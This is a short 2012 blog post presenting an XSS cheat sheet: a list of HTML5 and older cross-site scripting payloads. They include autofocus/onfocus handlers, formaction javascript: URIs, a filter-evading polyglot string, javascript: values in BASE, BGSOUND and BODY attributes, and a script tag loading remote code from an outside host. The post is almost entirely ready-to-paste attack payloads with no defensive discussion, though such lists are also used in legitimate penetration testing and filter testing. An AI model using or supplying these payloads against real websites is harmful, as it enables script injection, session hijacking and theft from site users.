Pages

  • RSS
  • Twitter
  • Facebook

Saturday, 15 September 2012

XSS Cheat Sheet! Including HTML 5 Vectors.

HTML5 Vectors -

Vectors by Gareth Heyes
Some vectors also from HTML5Sec
Regular Vectors from RSnake

HTML5 Web Applications
<input autofocus onfocus=alert(1)>
  -------------------------------------------------------------
<select autofocus onfocus=alert(1)>
  -------------------------------------------------------------
<textarea autofocus onfocus=alert(1)>

  -------------------------------------------------------------
<keygen autofocus onfocus=alert(1)>
  ------------------------------------------------------------- 
<form id="test"></form><button form="test" formaction="javascript:alert(1)">X</button>

  ------------------------------------------------------------- 
<body onscroll=alert(1)><br><br><br><br><br><br>...<br><br><br><br><input autofocus>

  -------------------------------------------------------------
<video onerror="javascript:alert(1)"><source></source></video>

  -------------------------------------------------------------
<form><button formaction="javascript:alert(1)">X</button> 
  -------------------------------------------------------------
<body oninput=alert(1)><input autofocus>

  -------------------------------------------------------------
<frameset onload=alert(1)
 
HTML Web Applications
 ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{}
  -------------------------------------------------------------
'';!--"<XSS>=&{()}
  -------------------------------------------------------------
<SCRIPT>alert('XSS')</SCRIPT>
  -------------------------------------------------------------
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
  -------------------------------------------------------------
<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
  -------------------------------------------------------------
<BASE HREF="javascript:alert('XSS');//">
  -------------------------------------------------------------
<BGSOUND SRC="javascript:alert('XSS');">
  -------------------------------------------------------------
<BODY BACKGROUND="javascript:alert('XSS');">
  -------------------------------------------------------------
<BODY ONLOAD=alert('XSS')>
 
The fuzzdb including hundreds of XSS vectors.

0 comments:

Post a comment